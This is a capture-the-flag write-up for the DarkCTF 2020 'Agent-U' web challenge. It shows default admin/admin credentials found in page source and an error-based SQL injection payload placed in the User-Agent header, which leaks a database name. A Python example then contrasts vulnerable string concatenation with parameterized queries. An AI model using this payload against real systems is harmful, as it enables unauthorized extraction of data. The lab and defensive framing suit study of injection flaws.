DarkCTF 2020: Web/Agent-U

Web/Agent-U

395 points

Agent U stole a database from my company but I don’t know which one. Can u help me to find it?
http://agent.darkarmy.xyz/
flag format darkCTF{databasename}

Solution

The page source reveals that the default credentials are admin/admin.


After login the site displays my User-Agent, so my first idea was to attempt SQL injection through the User-Agent header.


After a few attempts I finally ended up with the User-Agent value below ;-)

', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 1,1))), NULL); -- .

BINGO!


darkCTF{ag3ntu1sv3ryt3l3nt3d}
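The root cause behind the payload above, as an added example that is not the challenge's own code: a request header concatenated into an INSERT statement, next to the parameterized form that stores the same header as inert data. The `visits` table, the function names and the use of SQLite as a stand-in for the challenge's database are assumptions for illustration.

```python
import sqlite3

# User-Agent value from the write-up, used here only as test input.
PAYLOAD = ("', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) "
           "FROM information_schema.schemata LIMIT 1,1))), NULL); -- .")

def new_db():
    # Hypothetical logging table; the real schema is not shown on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (user_agent TEXT, ip TEXT, username TEXT)")
    return db

def log_visit_vulnerable(db, user_agent, ip, username):
    # Header text becomes part of the statement: a quote in it ends the
    # string literal and everything after is parsed as SQL.
    sql = ("INSERT INTO visits (user_agent, ip, username) "
           f"VALUES ('{user_agent}', '{ip}', '{username}')")
    db.execute(sql)

def log_visit_safe(db, user_agent, ip, username):
    # Bound parameters never reach the SQL parser as code.
    db.execute(
        "INSERT INTO visits (user_agent, ip, username) VALUES (?, ?, ?)",
        (user_agent, ip, username),
    )

def reaches_parser(log_fn, user_agent):
    """True if the header was interpreted as SQL instead of stored verbatim."""
    db = new_db()
    try:
        log_fn(db, user_agent, "203.0.113.7", "admin")  # constructed sample IP/user
    except (sqlite3.Error, sqlite3.Warning):
        # SQLite rejects the MySQL-specific names, which shows the header
        # value was compiled as part of the statement.
        return True
    rows = db.execute("SELECT user_agent FROM visits").fetchall()
    return rows != [(user_agent,)]

if __name__ == "__main__":
    for name, fn in (("concatenated", log_visit_vulnerable),
                     ("parameterized", log_visit_safe)):
        print(name, "-> header parsed as SQL:", reaches_parser(fn, PAYLOAD))
```

The payload only returns data because the database's error text is sent back to the client; binding parameters removes the injection, and returning a generic error page removes the leak channel.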
